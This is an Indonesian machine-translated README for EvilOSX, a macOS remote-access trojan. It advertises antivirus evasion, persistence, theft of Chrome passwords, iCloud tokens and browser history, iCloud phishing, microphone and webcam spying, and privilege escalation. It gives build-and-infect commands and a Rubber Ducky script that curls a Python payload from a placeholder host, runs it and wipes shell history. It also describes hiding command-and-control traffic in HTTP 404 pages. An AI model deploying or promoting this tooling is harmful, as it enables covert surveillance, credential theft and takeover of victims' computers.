EvilOSX

Generator Marco oleh Cedric Owens

• Meniru instance terminal
• Sistem modul yang dapat diperpanjang sederhana
• No Bot Dependencies (Pure Python)
• Tidak terdeteksi oleh anti-virus (OpenSSL AES-256 Payload Terenkripsi)
• Gigih
• Dukungan GUI dan CLI
• Ambil kata sandi chrome
• Ambil token dan kontak iCloud
• Ambil/monitor clipboard
• Ambil Sejarah Browser (Chrome dan Safari)
• Phish untuk Kata Sandi iCloud melalui iTunes
• enumerasi cadangan iTunes (iOS)
• Catat mikrofon
• Ambil tangkapan layar desktop atau gambar menggunakan webcam
• Mencoba untuk mendapatkan root melalui eskalasi hak istimewa lokal

 # Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX

# Go into the repository
$ cd EvilOSX

# Install dependencies required by the server
$ sudo pip install -r requirements.txt

# Start the GUI
$ python start.py

# Lastly, run a built launcher on your target(s)

PERINGATAN: Karena muatan dibuat unik untuk sistem target (secara otomatis oleh server), server harus berjalan ketika bot apa pun terhubung untuk pertama kalinya.

Ada juga CLI untuk mereka yang ingin menggunakan ini melalui SSH:

 # Create a launcher to infect your target(s)
$ python start.py --builder

# Start the CLI
$ python start.py --cli --port 1337

# Lastly, run a built launcher on your target(s) 

Proyek ini dibuat untuk digunakan dengan bebek karet saya, inilah skrip sederhananya:

 REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/

DELAY 1000
GUI SPACE
DELAY 500
STRING Termina
DELAY 1000
ENTER
DELAY 1500

REM Kill all terminals after x seconds
STRING screen -dm bash -c 'sleep 6; killall Terminal'
ENTER

STRING cd /tmp; curl -s HOST_TO_EVILOSX.py -o 1337.py; python 1337.py; history -cw; clear
ENTER

• Dibutuhkan sekitar 10 detik untuk backdoor mac yang tidak terkunci, yaitu ...... bagus
• Termina L dieja dengan cara itu dengan sengaja, pada beberapa sistem sorotan tidak akan menemukan terminal sebaliknya.
  
• Untuk memotong asisten pengaturan keyboard, pastikan Anda mengubah vid & pid yang dapat ditemukan di sini.
  Aluminium Keyboard (ISO) mungkin yang Anda cari.

Evilosx akan dipertahankan di bawah pedoman versi semantik sebanyak mungkin.
Rilis server dan bot akan diberi nomor dengan format berikut:

 <major>.<minor>.<patch>

Dan dibangun dengan pedoman berikut:

• Melanggar kompatibilitas ke belakang (dengan bot yang lebih tua) menabrak jurusan
• Tambahan baru tanpa melanggar kompatibilitas ke belakang menabrak minor
• Perbaikan bug dan perubahan misc menabrak tambalan

Untuk informasi lebih lanjut tentang SEMVER, silakan kunjungi https://semver.org/.

• Meninjau mesin dibagi menjadi tiga bagian:
  • Peluncur dijalankan di mesin target yang satu -satunya tujuannya adalah menjalankan stager
  • Stager meminta server untuk loader yang menangani bagaimana muatan akan dimuat
  • Loader diberi muatan yang dienkripsi secara unik dan kemudian dikirim kembali ke stager
• Server menyembunyikan komunikasi itu dengan mengirim pesan yang disembunyikan di halaman kesalahan HTTP 404 (dari Blackhat "Bersembunyi di Plain Sight")
  • Permintaan perintah diambil dari server melalui permintaan GET
  • Respons perintah dikirim ke server melalui permintaan pos
• Modul memanfaatkan sifat dinamis Python, mereka hanya dikirim melalui jaringan yang dikompresi dengan Zlib, bersama dengan opsi konfigurasi apa pun
• Karena bot hanya berkomunikasi dengan server dan tidak pernah sebaliknya, server tidak memiliki cara untuk mengetahui kapan bot berjalan offline

Jangan ragu untuk mengirimkan masalah atau permintaan fitur apa pun di sini.

Untuk panduan sederhana tentang cara membuat modul klik di sini.

• Proyek Kerajaan yang Luar Biasa
• Shoutout ke Patrick Wardle untuk pembicaraannya yang luar biasa, lihat Objective-lihat
• manwhoami untuk proyeknya: osxchromedecrypt, mmetokendecrypt, icloudcontacts
  (sekarang dihapus ... beri tahu saya jika Anda muncul kembali)
• Modul Slowloris cukup banyak disalin dari pyslowloris
• Urwid dan kode ini yang menghemat banyak waktu dengan CLI
• Logo yang dibuat oleh motusora

Gplv3